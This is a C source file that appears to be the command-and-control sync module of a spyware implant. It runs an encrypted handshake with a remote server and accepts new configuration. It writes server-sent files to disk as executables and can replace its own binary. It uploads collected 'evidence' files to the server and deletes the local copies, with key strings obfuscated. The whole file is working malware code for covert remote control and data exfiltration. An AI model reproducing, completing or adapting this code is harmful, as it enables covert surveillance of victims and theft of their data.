#define _BSD_SOURCE

#define PROTO_ERR         ((uint32_t)0x00)
#define PROTO_OK          ((uint32_t)0x01)
#define PROTO_NO          ((uint32_t)0x02)
#define PROTO_UNINSTALL   ((uint32_t)0x0a)

#define PROTO_ID              ((uint32_t)0x0f)
#define PROTO_UPGRADE         ((uint32_t)0x16)
#define PROTO_CONF            ((uint32_t)0x07)
#define PROTO_DOWNLOAD        ((uint32_t)0x0c)
#define PROTO_UPLOAD          ((uint32_t)0x0d)
#define PROTO_FILESYSTEM      ((uint32_t)0x19)
#define PROTO_EXEC            ((uint32_t)0x1b)
#define PROTO_EVIDENCE_SIZE   ((uint32_t)0x0b)
#define PROTO_EVIDENCE        ((uint32_t)0x09)
#define PROTO_BYE             ((uint32_t)0x03)

#define BIO_DECRYPT 0
#define BIO_ENCRYPT 1

#include <stdio.h>
#include <stdint.h>
#include <string.h>
#include <strings.h>
#include <unistd.h>
#include <openssl/bio.h>
#include <openssl/evp.h>
#include <openssl/sha.h>
#include <openssl/rand.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <dirent.h>
#include <curl/curl.h>
#include <glob.h>

#include "actionmanager.h"
#include "eventmanager.h"
#include "evidencemanager.h"
#include "module.h"
#include "config.h"
#include "params.h"
#include "me.h"
#include "so.h"

struct proto_ctx {
   CURL *curl;
   char host[256];
   unsigned char key[16];
   unsigned char iv[16];
   uint64_t time;
   struct {
      char upgrade;
      char conf;
      char filesystem;
      char download;
      char upload;
      char exec;
   } availables;
};
typedef struct proto_ctx PROTO_CTX;

struct additional {
   unsigned int version;
   unsigned int processlen;
   unsigned int windowlen;
   char window[16];
} __attribute__((packed));

int proto_auth(PROTO_CTX *proto_ctx);
int proto_id(PROTO_CTX *proto_ctx);
int proto_upgrade(PROTO_CTX *proto_ctx);
int proto_conf(PROTO_CTX *proto_ctx);
int proto_download(PROTO_CTX *proto_ctx);
int proto_upload(PROTO_CTX *proto_ctx);
int proto_exec(PROTO_CTX *proto_ctx);
int proto_filesystem(PROTO_CTX *proto_ctx);
int proto_sendevidence(PROTO_CTX *proto_ctx);
int proto_bye(PROTO_CTX *proto_ctx);
static int doreq(PROTO_CTX *proto_ctx, uint32_t command, BIO *bio_data);
static int filter(const struct dirent *de);
static int compar(const struct dirent **de1, const struct dirent **de2);
static size_t writefunc(char *ptr, size_t size, size_t nmemb, void *userdata);

int am_synchronize(subaction_synchronize_t *s)
{
   PROTO_CTX proto_ctx;
   struct curl_slist *hdr = NULL;
   int ret = 0;

   debugme("[RUN] action synchronize\n");

   do {
      memset(&proto_ctx, 0x00, sizeof(proto_ctx));
      if(snprintf(proto_ctx.host, sizeof(proto_ctx.host), "%s", s->host) >= sizeof(proto_ctx.host)) break;
      if(!(proto_ctx.curl = curl_easy_init())) break;
      if(!(hdr = curl_slist_append(hdr, so30))) break;
      if(!(hdr = curl_slist_append(hdr, so31))) break;
      if(curl_easy_setopt(proto_ctx.curl, CURLOPT_HTTPHEADER, hdr)) break;
      if(curl_easy_setopt(proto_ctx.curl, CURLOPT_COOKIEFILE, "")) break;
      if(curl_easy_setopt(proto_ctx.curl, CURLOPT_WRITEFUNCTION, writefunc)) break;
      if(curl_easy_setopt(proto_ctx.curl, CURLOPT_VERBOSE, 1L)) break;

      ret = proto_auth(&proto_ctx);
      if(ret == PROTO_NO) {
         ret = -1;
         break;
      } else if(ret == PROTO_UNINSTALL) {
         ret = -2;
         break;
      } else if(ret == PROTO_ERR) {
         ret = -3;
         break;
      }

      ret = proto_id(&proto_ctx);
      debugme("proto_id=%d\n", ret);

      if(ret == -1) break;
      if(proto_ctx.availables.upgrade) if(proto_upgrade(&proto_ctx)) ret = 4;
      if(proto_ctx.availables.conf) if(proto_conf(&proto_ctx)) ret = 3;
      //if(proto_ctx.availables.download) proto_download(&proto_ctx);
      if(proto_ctx.availables.upload) proto_upload(&proto_ctx);
      //if(proto_ctx.availables.exec) proto_exec(&proto_ctx);
      //if(proto_ctx.availables.filesystem) proto_filesystem(&proto_ctx);
      proto_sendevidence(&proto_ctx);
   } while(0);

   if(ret != -3) {
      proto_bye(&proto_ctx);
   } else {
      ret = -1;
   }


   if(proto_ctx.curl) curl_easy_cleanup(proto_ctx.curl);
   if(hdr) curl_slist_free_all(hdr);

   return ret;
}

int BIO_write_int(BIO *b, uint32_t i)
{
   return BIO_write(b, (uint32_t *)&i, sizeof(uint32_t));
}

int BIO_write_string(BIO *b, char *s)
{
   int ret;

   ret = BIO_write_int(b, (strlen(s) + 1) * 2);
   while(*s) {
      ret += BIO_write(b, s, 1);
      ret += BIO_write(b, "\0", 1);
      s++;
   }
   ret += BIO_write(b, "\0\0", 2);

   return ret;
}

uint32_t BIO_read_int(BIO *b)
{
   uint32_t ret;

   return (BIO_read(b, &ret, sizeof(ret)) == sizeof(ret)) ? ret : 0;
}

int BIO_read_string(BIO *b, char *s, int size)
{
   uint32_t len;
   uint16_t c;
   int ret = 1;
   char *p;
   
   if(size <= 0) return 0;

   len = BIO_read_int(b) / 2;

   p = s;

   while(len--) {
      if(BIO_read(b, &c, sizeof(c)) != sizeof(c)) {
         ret = 0;
         break;
      }

      if(!ret) continue;

      if((c < 0x0080) && (size > 1)) {
         *p++ = (char)c;
         size--;
      } else if((c < 0x0800) && (size > 2)) {
         *p++ = (char)(0xC0|(c>>6));
         *p++ = (char)(0x80|(c&0x3F));
         size -= 2;
      } else if(size > 3) {
         *p++ = (char)(0xE0|(c>>12));
         *p++ = (char)(0x80|((c>>6)&0x3F));
         *p++ = (char)(0x80|(c&0x3F));
         size -= 3;
      } else {
         ret = 0;
      }
   }

   if(!ret || ((p != s) && *--p)) {
      *s = '\0';
      ret = 0;
   } else {
      ret = strlen(s);
   }

   return ret;
}

int proto_auth(PROTO_CTX *proto_ctx)
{
   unsigned char devicekey[16], serverkey[16], nonce[16], end[16], sha[SHA_DIGEST_LENGTH];
   BIO *bio_req = NULL, *bio_resp = NULL, *bio_cipher = NULL, *bio_mem = NULL;
   int ret = PROTO_ERR, endlen;
   SHA_CTX sha_ctx;
   char *dataptr, url[256];
   long int datalen;

   do {
      if(RAND_pseudo_bytes(devicekey, sizeof(devicekey)) == -1) break;
      if(RAND_pseudo_bytes(nonce, sizeof(nonce)) == -1) break;
      if(RAND_pseudo_bytes(end, sizeof(end)) == -1) break;
      endlen = (time(NULL) % 15) + 1;

      if(!SHA1_Init(&sha_ctx)) break;
      if(!SHA1_Update(&sha_ctx, bps.build, 16)) break;
      if(!SHA1_Update(&sha_ctx, instance, 20)) break;
      if(!SHA1_Update(&sha_ctx, bps.subtype, 16)) break;
      if(!SHA1_Update(&sha_ctx, bps.confkey, 16)) break;
      if(!SHA1_Final(sha, &sha_ctx)) break;

      if(!(bio_req = BIO_new(BIO_s_mem()))) break;
      if(!(bio_cipher = BIO_new(BIO_f_cipher()))) break;
      memset(proto_ctx->iv, 0x00, sizeof(proto_ctx->iv));
      BIO_set_cipher(bio_cipher, EVP_get_cipherbyname(so32), bps.signature, proto_ctx->iv, BIO_ENCRYPT);
      BIO_push(bio_cipher, bio_req);

      if(BIO_write(bio_cipher, devicekey, sizeof(devicekey)) != sizeof(devicekey)) break;
      if(BIO_write(bio_cipher, nonce, sizeof(nonce)) != sizeof(nonce)) break;
      if(BIO_write(bio_cipher, bps.build, 16) != 16) break;
      if(BIO_write(bio_cipher, instance, 20) != 20) break;
      if(BIO_write(bio_cipher, bps.subtype, 16) != 16) break;
      if(BIO_write(bio_cipher, sha, sizeof(sha)) != sizeof(sha)) break;
      BIO_flush(bio_cipher);
      BIO_pop(bio_cipher);
      if(BIO_write(bio_req, end, endlen) != endlen) break;
      BIO_flush(bio_req);
      
      if(snprintf(url, sizeof(url), so33, proto_ctx->host) >= sizeof(url)) break;
      if(!(datalen = BIO_get_mem_data(bio_req, &dataptr))) break;
      if(!(bio_resp = BIO_new(BIO_s_mem()))) break;
      if(curl_easy_setopt(proto_ctx->curl, CURLOPT_URL, url)) break;
      if(curl_easy_setopt(proto_ctx->curl, CURLOPT_POSTFIELDS, dataptr)) break;
      if(curl_easy_setopt(proto_ctx->curl, CURLOPT_POSTFIELDSIZE, datalen)) break;
      if(curl_easy_setopt(proto_ctx->curl, CURLOPT_WRITEDATA, bio_resp)) break;
      if(curl_easy_perform(proto_ctx->curl)) break;
      if(!(datalen = BIO_get_mem_data(bio_resp, &dataptr))) break;

      if(!(bio_mem = BIO_new(BIO_s_mem()))) break;
      memset(proto_ctx->iv, 0x00, sizeof(proto_ctx->iv));
      BIO_set_cipher(bio_cipher, EVP_get_cipherbyname(so32), bps.signature, proto_ctx->iv, BIO_DECRYPT);
      BIO_push(bio_cipher, bio_mem);

      if(BIO_write(bio_cipher, dataptr, 32) != 32) break;
      BIO_flush(bio_cipher);
      if(BIO_read(bio_mem, serverkey, sizeof(serverkey)) != sizeof(serverkey)) break;

      if(!SHA1_Init(&sha_ctx)) break;
      if(!SHA1_Update(&sha_ctx, bps.confkey, 16)) break;
      if(!SHA1_Update(&sha_ctx, serverkey, sizeof(serverkey))) break;
      if(!SHA1_Update(&sha_ctx, devicekey, sizeof(devicekey))) break;
      if(!SHA1_Final(proto_ctx->key, &sha_ctx)) break;

      if(BIO_reset(bio_mem) == -1) break;
      memset(proto_ctx->iv, 0x00, sizeof(proto_ctx->iv));
      BIO_set_cipher(bio_cipher, EVP_get_cipherbyname(so32), proto_ctx->key, proto_ctx->iv, BIO_DECRYPT);

      if(BIO_write(bio_cipher, dataptr + 32, datalen - 32) != (datalen - 32)) break;
      BIO_flush(bio_cipher);
      if((datalen = BIO_get_mem_data(bio_mem, &dataptr)) < (sizeof(nonce) + sizeof(ret))) break;
      if(memcmp(nonce, dataptr, sizeof(nonce))) break;

      ret = *((unsigned int *)(dataptr + sizeof(nonce)));
   } while(0);

   if(bio_req) BIO_free(bio_req);
   if(bio_resp) BIO_free(bio_resp);
   if(bio_cipher) BIO_free(bio_cipher);
   if(bio_mem) BIO_free(bio_mem);

   return ret;
}

int proto_id(PROTO_CTX *proto_ctx)
{
   BIO *bio_data = NULL;
   char *dataptr = NULL;
   long int datalen;
   int ret = PROTO_ERR;

   int num, i;

   do {
      if(!(bio_data = BIO_new(BIO_s_mem()))) break;

      BIO_write_int(bio_data, bps.version);
      BIO_write_string(bio_data, user);
      BIO_write_string(bio_data, host);
      BIO_write_string(bio_data, "");

      if((ret = doreq(proto_ctx, PROTO_ID, bio_data)) != PROTO_OK) break;
      if(!(datalen = BIO_get_mem_data(bio_data, &dataptr))) break;

      proto_ctx->time = *((uint64_t *)dataptr);
      dataptr += sizeof(proto_ctx->time);
      num = *((int *)dataptr);
      dataptr += sizeof(num);

      for(i = 0; i < num; i++) {
         switch(*(((uint32_t *)dataptr) + i)) {
            case PROTO_UPGRADE:
               proto_ctx->availables.upgrade = 1;
               break;
            case PROTO_CONF:
               proto_ctx->availables.conf = 1;
               break;
            case PROTO_DOWNLOAD:
               proto_ctx->availables.download = 1;
               break;
            case PROTO_UPLOAD:
               proto_ctx->availables.upload = 1;
               break;
            case PROTO_EXEC:
               proto_ctx->availables.exec = 1;
               break;
            case PROTO_FILESYSTEM:
               proto_ctx->availables.filesystem = 1;
               break;
         }
      }
   } while(0);

   if(bio_data) BIO_free(bio_data);

   return 0;
}

int proto_upgrade(PROTO_CTX *proto_ctx)
{
   BIO *bio_data = NULL, *bio_file = NULL;
   int ret, val = PROTO_ERR;
   char *ptr;
   uint32_t left;
   char name[512];

   debugme("PROTO_UPGRADE\n");

   do {
      if(!(bio_data = BIO_new(BIO_s_mem()))) break;
      if((ret = doreq(proto_ctx, PROTO_UPGRADE, bio_data)) != PROTO_OK) break;

      left = BIO_read_int(bio_data);
      BIO_read_string(bio_data, name, sizeof(name));
      ret = BIO_get_mem_data(bio_data, &ptr);

      debugme("upgrade file %s (%d left)\n", name, left);

      if(!(bio_file = BIO_new_file(name, "w"))) return PROTO_ERR;
      BIO_write(bio_file, ptr + sizeof(left), ret - sizeof(left));
      BIO_free(bio_file);
      BIO_free(bio_data);
      chmod(name, 0755);
      if(!strcmp(name, so36)) {
         rename(name, so37);
         val = 4;
      }
   } while(left);

   return val;
}

int proto_conf(PROTO_CTX *proto_ctx)
{
   BIO *bio_data = NULL, *bio_file = NULL;
   int ret = PROTO_ERR;
   long int datalen;
   char *dataptr = NULL;

   debugme("|> CONF begin\n");

   do {
      if(!(bio_data = BIO_new(BIO_s_mem()))) break;
      if((ret = doreq(proto_ctx, PROTO_CONF, bio_data)) != PROTO_OK) break;
      ret = PROTO_ERR;
      if(!(datalen = BIO_get_mem_data(bio_data, &dataptr))) break;
      if(!(bio_file = BIO_new_file(so38, "w"))) break;
      if(BIO_write(bio_file, dataptr, datalen) != datalen) break;
      BIO_free(bio_file);
      bio_file = NULL;

      am_stopqueue(QUEUE_FAST);
      stopmodule();
      parseconfig(so38);
      am_startqueue(QUEUE_FAST);
      em_scheduleevents();

      if(BIO_reset(bio_data) == -1) break;

      BIO_write_int(bio_data, PROTO_OK);
      if((ret = doreq(proto_ctx, PROTO_CONF, bio_data)) != PROTO_OK) break;
   } while(0);

   if(bio_data) BIO_free(bio_data);
   if(bio_file) BIO_free(bio_file);

   debugme("|> CONF end (%d)\n", ret);

   return ret;
}

int proto_download(PROTO_CTX *proto_ctx)
{
   BIO *bio_data = NULL, *bio_file = NULL, *bio_content = NULL;
   uint32_t num;
   char name[512], buf[4096];
   int ret = PROTO_ERR, chunk;
   glob_t globbuf;
   struct stat s;
   char *ptr = NULL;
   /*struct additional a;*/

   debugme("|> DOWNLOAD begin\n");

   do {
      if(!(bio_data = BIO_new(BIO_s_mem()))) break;
      if((ret = doreq(proto_ctx, PROTO_DOWNLOAD, bio_data)) != PROTO_OK) break;

      num = BIO_read_int(bio_data);
      debugme("Processing %u patterns\n", num);

      while(num--) {
         if(BIO_read_string(bio_data, name, sizeof(name))) debugme("- Pattern: %s\n", name);

         if(glob(name, GLOB_NOSORT|GLOB_TILDE, NULL, &globbuf)) continue;

         debugme("-- %d matches\n", globbuf.gl_pathc);
         while(globbuf.gl_pathc--) {
            if((stat(globbuf.gl_pathv[globbuf.gl_pathc], &s) == -1) || (!S_ISREG(s.st_mode))) continue;
            debugme("--- %s\n", globbuf.gl_pathv[globbuf.gl_pathc]);
            if(!(bio_file = BIO_new_file(globbuf.gl_pathv[globbuf.gl_pathc], "r"))) break;
            if(!(bio_content = BIO_new(BIO_s_mem()))) break;
            while(!BIO_eof(bio_file)) {
               chunk = BIO_read(bio_file, buf, sizeof(buf));
               BIO_write(bio_content, buf, chunk);
            }
            chunk = BIO_get_mem_data(bio_data, &ptr);
            /*evidence_write(EVIDENCE_TYPE_DOWNLOAD, &a, 0, ptr, chunk);*/
            BIO_free(bio_file);
            bio_file = NULL;
            BIO_free(bio_content);
            bio_content = NULL;
         }

         globfree(&globbuf);
      }

   } while(0);

   if(bio_data) BIO_free(bio_data);
#if 0
   if(bio_file) BIO_free(bio_file);
#endif

   debugme("|> DOWNLOAD end (%d)\n", ret);

   return ret;
}

int proto_upload(PROTO_CTX *proto_ctx)
{
   BIO *bio_data = NULL, *bio_file = NULL;
   int ret;
   char *ptr;
   uint32_t left;
   char name[512];

   debugme("PROTO_UPLOAD\n");

   do {
      if(!(bio_data = BIO_new(BIO_s_mem()))) return -1;
      if((ret = doreq(proto_ctx, PROTO_UPLOAD, bio_data)) == PROTO_NO) break;

      left = BIO_read_int(bio_data);
      BIO_read_string(bio_data, name, sizeof(name));
      ret = BIO_get_mem_data(bio_data, &ptr);

      debugme("upload file %s (%d left)\n", name, left);

      if(!(bio_file = BIO_new_file(name, "w"))) return PROTO_NO;
      BIO_write(bio_file, ptr + sizeof(left), ret - sizeof(left));
      BIO_free(bio_file);
      BIO_free(bio_data);
      chmod(name, 0755);
      /* XXX da togliere */
      if(!strcmp(name, so36)) {
         rename(name, so37);
      }
      /* XXX */
   } while(left);

   return 0;
}

int proto_exec(PROTO_CTX *proto_ctx)
{
   BIO *bio_data = NULL;
   uint32_t num;
   char name[512];

   debugme("EXEC\n");
   if(!(bio_data = BIO_new(BIO_s_mem()))) return -1;
   if(doreq(proto_ctx, PROTO_EXEC, bio_data) == PROTO_NO) return PROTO_NO;

   num = BIO_read_int(bio_data);

   while(num--) {
      if(BIO_read_string(bio_data, name, sizeof(name))) debugme("exec - %s\n", name);
   }

   BIO_free(bio_data);

   return 0;
}

int proto_filesystem(PROTO_CTX *proto_ctx)
{
   BIO *bio_data = NULL;
   uint32_t num, depth;
   char name[512];

   debugme("FILESYSTEM\n");
   if(!(bio_data = BIO_new(BIO_s_mem()))) return -1;
   if(doreq(proto_ctx, PROTO_FILESYSTEM, bio_data) == PROTO_NO) return PROTO_NO;

   num = BIO_read_int(bio_data);

   while(num--) {
      depth = BIO_read_int(bio_data);
      if(BIO_read_string(bio_data, name, sizeof(name))) debugme("- %s (depth: %u)\n", name, depth);
   }

   BIO_free(bio_data);

   return 0;
}

int proto_sendevidence(PROTO_CTX *proto_ctx)
{
   BIO *bio_data = NULL;
   int ret = PROTO_ERR, len;

   struct stat s;
   FILE *fp = NULL;
   char buf[1024];
   int n = 0, i;
   struct dirent **de = NULL;

   /* TODO XXX stabilizza la coda di evidence */

   debugme("|> EVIDENCE begin\n");

   do {
      if(!(bio_data = BIO_new(BIO_s_mem()))) break;

      if((n = scandir(".", &de, filter, compar)) < 0) break;
      debugme("Sending %d evidences\n", n);
      for(i = 0; i < n; i++)  {
         if(BIO_reset(bio_data) == -1) break;
         if(stat(de[i]->d_name, &s) == -1) break;
         if(!(fp = fopen(de[i]->d_name, "r"))) break;
         debugme("sending evidence %d/%d -> %s\n", i + 1, n, de[i]->d_name);

         BIO_write_int(bio_data, s.st_size);
         while((len = fread(buf, 1, sizeof(buf), fp))) {
            if(BIO_write(bio_data, buf, len) != len) break;
         }
         if(!feof(fp)) break;
         fclose(fp);
         fp = NULL;

         if(curl_easy_setopt(proto_ctx->curl, CURLOPT_USERAGENT, de[i]->d_name)) break;
         if((ret = doreq(proto_ctx, PROTO_EVIDENCE, bio_data)) != PROTO_OK) break;
         debugme("done evidence %d/%d (%d)-> %s\n", i + 1, n, ret, de[i]->d_name);

         unlink(de[i]->d_name);
      }
   } while(0);

   if(bio_data) BIO_free(bio_data);
   if(fp) fclose(fp);
   if(de) {
      for(i = 0; i < n; i++) free(de[i]);
      free(de);
   }

   debugme("|> EVIDENCE end (%d)\n", ret);

   return ret;
}

int proto_bye(PROTO_CTX *proto_ctx)
{
   BIO *bio_data = NULL;
   int ret = PROTO_ERR;

   debugme("|> BYE begin\n");

   do {
      if(!(bio_data = BIO_new(BIO_s_mem()))) break;
      if((ret = doreq(proto_ctx, PROTO_BYE, bio_data)) != PROTO_OK) break;
   } while(0);

   if(bio_data) BIO_free(bio_data);

   debugme("|> BYE end (%d)\n", ret);

   return ret;
}

/* mancano i controlli d'errore sui valori di ritorno */
static int doreq(PROTO_CTX *proto_ctx, uint32_t command, BIO *bio_data)
{
   BIO *bio_req = NULL, *bio_resp = NULL, *bio_cipher = NULL, *bio_md = NULL;
   char url[256], *data = NULL, sha[SHA_DIGEST_LENGTH], check[SHA_DIGEST_LENGTH];
   uint32_t len = 0, cmd;
   int ret = PROTO_ERR;
   unsigned char end[16];
   int endlen;
   char *dataptr;
   long int datalen = 0;

   do {
      if(bio_data) {
         BIO_flush(bio_data);
         datalen = BIO_get_mem_data(bio_data, &dataptr);
      }

      if(RAND_pseudo_bytes(end, sizeof(end)) == -1) break;
      endlen = (time(NULL) % 15) + 1;

      if(!(bio_req = BIO_new(BIO_s_mem()))) break;
      if(!(bio_cipher = BIO_new(BIO_f_cipher()))) break;
      if(!(bio_md = BIO_new(BIO_f_md()))) break;
      memset(proto_ctx->iv, 0x00, sizeof(proto_ctx->iv));
      BIO_set_cipher(bio_cipher, EVP_get_cipherbyname(so32), proto_ctx->key, proto_ctx->iv, BIO_ENCRYPT);
      if(!BIO_set_md(bio_md, EVP_sha1())) break;
      BIO_push(bio_cipher, bio_req);
      BIO_push(bio_md, bio_cipher);

      /* TODO XXX controllare valori di ritorno */
      BIO_write_int(bio_md, command);
      if(datalen) BIO_write(bio_md, dataptr, datalen);
      BIO_gets(bio_md, sha, sizeof(sha));
      BIO_pop(bio_md);
      BIO_write(bio_cipher, sha, sizeof(sha));
      BIO_flush(bio_cipher);
      BIO_pop(bio_cipher);
      BIO_write(bio_req, end, endlen);
      BIO_flush(bio_req);
      /* * * * */

      if(snprintf(url, sizeof(url), so33, proto_ctx->host) >= sizeof(url)) break;
      if(!(datalen = BIO_get_mem_data(bio_req, &dataptr))) break;
      if(!(bio_resp = BIO_new(BIO_s_mem()))) break;
      if(curl_easy_setopt(proto_ctx->curl, CURLOPT_URL, url)) break;
      if(curl_easy_setopt(proto_ctx->curl, CURLOPT_POSTFIELDS, dataptr)) break;
      if(curl_easy_setopt(proto_ctx->curl, CURLOPT_POSTFIELDSIZE, datalen)) break;
      if(curl_easy_setopt(proto_ctx->curl, CURLOPT_WRITEDATA, bio_resp)) break;
      if(curl_easy_perform(proto_ctx->curl)) break;

      if(BIO_write(bio_resp, so44, 16) != 16) break;
      if(BIO_reset(bio_data) != 1) break;
      if(BIO_reset(bio_md) != 0) break;
      memset(proto_ctx->iv, 0x00, sizeof(proto_ctx->iv));
      BIO_set_cipher(bio_cipher, EVP_get_cipherbyname(so32), proto_ctx->key, proto_ctx->iv, BIO_DECRYPT);
      BIO_push(bio_cipher, bio_resp);
      BIO_push(bio_md, bio_cipher);

      if(BIO_read(bio_md, &cmd, sizeof(cmd)) != sizeof(cmd)) break;
      if(cmd == PROTO_OK) {
         if(BIO_read(bio_md, &len, sizeof(len)) != sizeof(len)) break;
         if(len) {
            if(!(data = malloc(len))) break;
            if(BIO_read(bio_md, data, len) != len) break;
            if(BIO_write(bio_data, data, len) != len) break;
         }
      }
      if(BIO_gets(bio_md, sha, sizeof(sha)) != sizeof(sha)) break;
      if(BIO_read(bio_cipher, check, sizeof(check)) != sizeof(check)) break;
      if(memcmp(sha, check, sizeof(sha))) break;

      ret = cmd;
   } while(0);

   if(bio_req) BIO_free(bio_req);
   if(bio_resp) BIO_free(bio_resp);
   if(bio_cipher) BIO_free(bio_cipher);
   if(bio_md) BIO_free(bio_md);
   if(data) free(data);

   return ret;
}

static int filter(const struct dirent *de)
{
   struct stat s;

   return ((!stat(de->d_name, &s) && (s.st_mode & S_IFREG) && (s.st_mode & S_ISVTX)) ? 1 : 0);
}

static int compar(const struct dirent **de1, const struct dirent **de2)
{
   struct stat s1, s2;

   if(stat((*de1)->d_name, &s1) || stat((*de2)->d_name, &s2)) return 0;

   return (((int)s1.st_mtime) - ((int)s2.st_mtime));
}

static size_t writefunc(char *ptr, size_t size, size_t nmemb, void *userdata)
{
   return BIO_write((BIO *)userdata, ptr, nmemb * size);
}
